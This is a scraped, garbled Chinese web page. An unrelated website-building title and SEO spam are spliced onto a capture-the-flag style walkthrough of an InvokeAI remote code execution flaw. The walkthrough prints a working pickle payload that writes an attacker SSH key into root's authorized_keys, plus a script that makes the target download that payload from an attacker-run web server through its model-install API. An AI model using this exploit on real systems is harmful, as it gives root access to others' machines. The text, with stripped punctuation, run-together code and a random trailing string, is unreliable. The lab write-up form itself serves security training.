企业官网建设流程全解析

苏州网站建设营销,中山哪里网站建设,wordpress微信公众号开发教程,wordpress 肖InvokeAI_RCE | PG Walkthrough 搜索“invokeai_rce”#xff0c;你很快就能找到CVE-2024-12029。事实证明#xff0c;“huntr”是新的AI/ML CVE网站。 huntr - 世界上第一个AI/ML漏洞赏金平台 世界上第一个AI/ML漏洞赏金平台 世界上第一个AI/ML漏洞赏金平台 huntr.com^ 基本…InvokeAI_RCE | PG Walkthrough搜索“invokeai_rce”你很快就能找到CVE-2024-12029。事实证明“huntr”是新的AI/ML CVE网站。huntr - 世界上第一个AI/ML漏洞赏金平台世界上第一个AI/ML漏洞赏金平台世界上第一个AI/ML漏洞赏金平台huntr.com^基本上按照此链接中的概念验证进行操作。解决此靶机的主要技巧是找到该链接。靶机的描述建议创建一个密钥并使用载荷将id_rsa.pub上传到root用户的authorized_keys文件中。首先使用以下命令创建密钥ssh-keygen复制id_rsa.pub并将其用于ssh.py中的载荷。使用ssh.py如上文链接中的PoC所示生成载荷。ckpt文件将把公钥回显到目标机器的root用户的authorized_keys文件中。importpickleclassPayload:def__reduce__(self):importosreturn(os.system,(echo ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIA0mDlI9bbgZq0XYTKvGjo/Q6/By7bxTP6VwRqs3sh1 rootkali /root/.ssh/authorized_keys,))defgenerate_payload():# Not .pklwithopen(payload.ckpt,wb)asf:pickle.dump(Payload(),f)generate_payload()在payload.ckpt所在位置设置一个Web服务器并在exploit.py中引用它以执行载荷将攻击者的id_rsa.pub公钥粘贴到目标的root用户authorized_keys文件中。importrequests urlhttp://192.168.159.218:9090/api/v2/models/installparams{source:http://192.168.45.227:8080/payload.ckpt,inplace:true}responserequests.post(url,paramsparams,json{})print(response.text)确保为id_rsa文件赋予必要的权限chmod 600 id_rsa然后使用通过ssh-keygen生成的id_rsa密钥以root用户身份进行SSH连接。CSD0tFqvECLokhw9aBeRqlyK5KMpaklojJBUegXcB9J/111yYeGSJSiNtXQwSVQ0pWHI2mbOG2VnyH8b7ErlJ218esbpf7cQT5JJbS3PF4agwWGfdflw3pgF9XrX更多精彩内容 请关注我的个人公众号 公众号办公AI智能小助手对网络安全、黑客技术感兴趣的朋友可以关注我的安全公众号网络安全技术点滴分享